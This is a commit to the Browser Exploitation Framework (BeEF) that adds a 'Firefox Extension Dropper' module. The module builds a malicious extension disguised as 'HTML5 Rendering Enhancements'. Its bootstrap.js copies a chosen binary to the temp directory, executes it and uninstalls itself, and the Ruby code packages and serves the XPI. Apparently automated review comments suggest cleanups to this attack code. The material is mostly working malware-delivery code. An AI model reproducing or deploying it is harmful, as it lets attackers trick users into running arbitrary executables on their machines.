From antisnatchor with love. New module: malicious Firefox Extension dropper. Based on @mihi42 FF extension.

antisnatchor
2013-10-10 15:18:03 +01:00
parent 45c51180a6
commit 5dd46ffd72
8 changed files with 210 additions and 0 deletions



@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
firefox_extension_dropper:
enable: true
category: ["Exploits", "Local Host"]
name: "Firefox Extension Dropper"
description: "Create on the fly a malicious Firefox extension that embeds a dropper you can specify (add it to the 'dropper' directory). <br/><br/> The extension is based on the original work from Michael Schierl and his Metasploit module."
authors: ["antisnatchor"]
target:
user_notify: ["FF"]
not_working: ["All"]


@@ -0,0 +1,2 @@
Place in this directory the binary you want to drop and execute through the Firefox extension.
Make sure to have just ONE file in this directory (other than this readme.txt).


@@ -0,0 +1,30 @@
function startup(data, reason) {
var file = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("ProfD", Components.interfaces.nsIFile);
file.append("extensions");
xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";payload_name="__payload_placeholder__";
file.append(xpi_guid);
file.append(payload_name);
var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("TmpD", Components.interfaces.nsIFile);
tmp.append(payload_name);
tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
file.copyTo(tmp.parent, tmp.leafName);
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(tmp);
process.run(false,[],0);
try { // Fx < 4.0
Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
} catch (e) {}
try { // Fx 4.0 and later
Components.utils.import("resource://gre/modules/AddonManager.jsm");
AddonManager.getAddonByID(xpi_guid, function(addon) {
addon.uninstall();
});
} catch (e) {}
}
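Review bot: On the `xpi_guid="{861fb387-…}";payload_name="__payload_placeholder__";` line both names are assigned without `var`, so they become implicit globals of the extension scope instead of locals of `startup`, and two statements are packed onto one line unlike the rest of the function. Declare them as locals, one per line, `var xpi_guid = "{861fb387-92ce-bb0a-cb48-4b923dbc292b}";` and `var payload_name = "__payload_placeholder__";`, matching the `var file`/`var tmp` declarations above. The placeholder string is the value `pre_send` substitutes at build time, so a short comment on that line saying so would help the next maintainer.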


@@ -0,0 +1,2 @@
content {861fb387-92ce-bb0a-cb48-4b923dbc292b} ./
overlay chrome://browser/content/browser.xul chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul


@@ -0,0 +1,24 @@
<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>{861fb387-92ce-bb0a-cb48-4b923dbc292b}</em:id>
<em:name>__extension_name_placeholder__</em:name>
<em:version>1.0</em:version>
<em:bootstrap>true</em:bootstrap>
<em:unpack>true</em:unpack>
<em:targetApplication>
<Description>
<em:id>toolkit@mozilla.org</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>


@@ -0,0 +1,5 @@
<?xml version="1.0"?>
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="bootstrap.js"/>
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
</overlay>


@@ -0,0 +1,92 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Firefox_extension_dropper < BeEF::Core::Command
class Bind_extension < BeEF::Core::Router::Router
before do
headers 'Content-Type' => 'application/x-xpinstall',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
get '/' do
response['Content-Type'] = "application/x-xpinstall"
extension_path = settings.extension_path
print_info "Serving malicious Firefox Extension Dropper: #{extension_path}"
send_file "#{extension_path}",
:type => 'application/x-xpinstall',
:disposition => 'inline'
end
end
def pre_send
# gets the value configured in the module configuration by the user
@datastore.each do |input|
if input['name'] == "extension_name"
@extension_name = input['value']
end
if input['name'] == "xpi_name"
@xpi_name = input['value']
end
end
mod_path = "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper"
extension_path = mod_path + "/extension"
# retrieve the name of the dropper binary
Dir.foreach("#{mod_path}/dropper") do |item|
if item != "readme.txt" && item != "." && item != ".."
@dropper = item
puts "dropper: " + @dropper
end
end
# clean the build directory
FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
# copy in the build directory necessary file, substituting placeholders
File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)}
File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__payload_placeholder__", @dropper)}
File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")}
File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")}
FileUtils.cp "#{mod_path}/dropper/#{@dropper}", "#{extension_path}/build/#{@dropper}"
extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest", @dropper]
# create the XPI extension container
xpi = "#{extension_path}/#{@xpi_name}.xpi"
if File.exist?(xpi)
File.delete(xpi)
end
Zip::File.open(xpi, Zip::File::CREATE) do |xpi|
extension_content.each do |filename|
xpi.add(filename, "#{extension_path}/build/#(unknown)")
end
end
# mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specifi content-type/disposition)
bind_extension = Firefox_extension_dropper::Bind_extension
bind_extension.set :extension_path, "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper/extension/#{@xpi_name}.xpi"
BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new)
BeEF::Core::Server.instance.remap
end
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
return [
{'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
{'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},
{'name' => 'domain', 'ui_label' => 'Serving Domain', 'value' => 'http://beefdomain'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
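Review bot: `@xpi_name` is read straight from the datastore in `pre_send` and interpolated unvalidated into the filesystem path `xpi = "#{extension_path}/#{@xpi_name}.xpi"` (which is then `File.delete`d and recreated) and into the mount path `"/#{@xpi_name}.xpi"`, so a value containing `/` or `..` writes and deletes outside the extension directory and registers an arbitrary route on the BeEF server. Constrain it to a plain token before use, e.g. `raise ArgumentError, 'invalid xpi_name' unless @xpi_name.to_s.match?(/\A[\w-]+\z/)` (anchored with `\A`/`\z`, not `^`/`$`), or report with `print_error` and return if the module convention is not to raise. The `File.read(...).gsub!(...)` calls for `install.rdf` and `bootstrap.js` return `nil` when the placeholder is absent (so `file.puts` writes an empty file) and raise `TypeError` when `@dropper` is still `nil` because the `dropper` directory holds no binary; use `gsub` and check `@dropper` explicitly after the `Dir.foreach` loop. In `self.options`, `beef_host` is computed from the configuration but never used while the `domain` option is hard-coded to `'http://beefdomain'`; either use `beef_host` there or drop the unused local. Finally, the block parameter in `Zip::File.open(xpi, Zip::File::CREATE) do |xpi|` shadows the outer local `xpi`, and `puts "dropper: " + @dropper` should go through `print_info` like the other log line in this module.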